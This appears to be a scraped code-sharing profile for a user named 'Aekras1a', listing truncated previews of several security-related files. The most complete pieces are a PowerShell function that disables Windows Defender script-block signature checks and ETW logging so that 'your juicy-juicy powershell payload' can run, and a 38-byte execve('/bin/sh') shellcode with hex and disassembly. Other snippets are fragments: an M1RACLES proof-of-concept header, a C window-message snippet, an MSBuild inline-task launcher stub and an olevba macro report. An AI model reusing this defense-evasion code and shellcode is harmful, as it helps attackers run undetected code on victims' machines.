Aekras1a

/*
 * m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1.
 * 
 * This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register.
 *
 * Please visit m1racles.com for more information.
 *
 * Licensed under the MIT license.
 */

Aekras1a

using Microsoft.VisualBasic;
using Microsoft.VisualBasic.Devices;
using System;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;

namespace WindowsFormsApp8
{

Aekras1a

# this script can bypass all AVs features that will stop you from running your juicy-juicy powershell payload REFLECTIVELY
# run this script before running your payload,and make sure that its runned on the same session!
# DONT COMBINE THIS SCRIPT WITH YOUR PAYLOAD,OTHERWISE IT WILL NOT WORK!!!
# you dont need to invoke the function again!
function Invoke-OneDoesNotSimplyBypassEntireWinDefender {
    [ScriptBlock]."GetFiel`d"('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
    [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
    $increment = 0
    $maxincrement = 30000000
    For ($increment=0; $increment -lt $maxincrement;$increment++) { $increment++ }

Aekras1a

using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;

/*

Aekras1a

olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------

Aekras1a

#include <windows.h> 
#include <stdio.h>
#include <stdint.h>

#pragma comment(lib, "USER32")

FARPROC NtUserPostMessage;

BOOL CALLBACK QueryWindowMessageProc(HWND Window, LPARAM Param)
{

Aekras1a

/*
 * Linux x86(-64) - execve("/bin/sh", ["/bin/sh", 0], 0) shellcode (38 bytes)
 * 31c050488b1424eb105478065e5fb03b0f05595b40b00bcd80e8ebffffff2f62696e2f736800
 *
 * - offset -  bytes           32-bit code           64-bit code
 * 0x00000000  31c0            xor eax, eax          xor eax, eax
 * 0x00000002  50              push eax              push rax
 * 0x00000003  48              dec eax               rex.w
 * 0x00000004  8b1424          mov edx, dword [esp]  mov rdx, qword [rsp]
 * 0x00000007  eb10            jmp 0x19              jmp 0x19

Aekras1a

Keybase proof

I hereby claim:

• I am aekras1a on github.
• I am aekras1a (https://keybase.io/aekras1a) on keybase.
• I have a public key ASDM8Wk6BCTdO4m_rBWpFk84AtPlaXjhjrperQ8nQ0cmoQo

To claim this, I am signing this object:

Aekras1a

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="NotSubTee">
   <BusinessTime />
  </Target>
<UsingTask
    TaskName="BusinessTime"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <ParameterGroup/>
    <Task>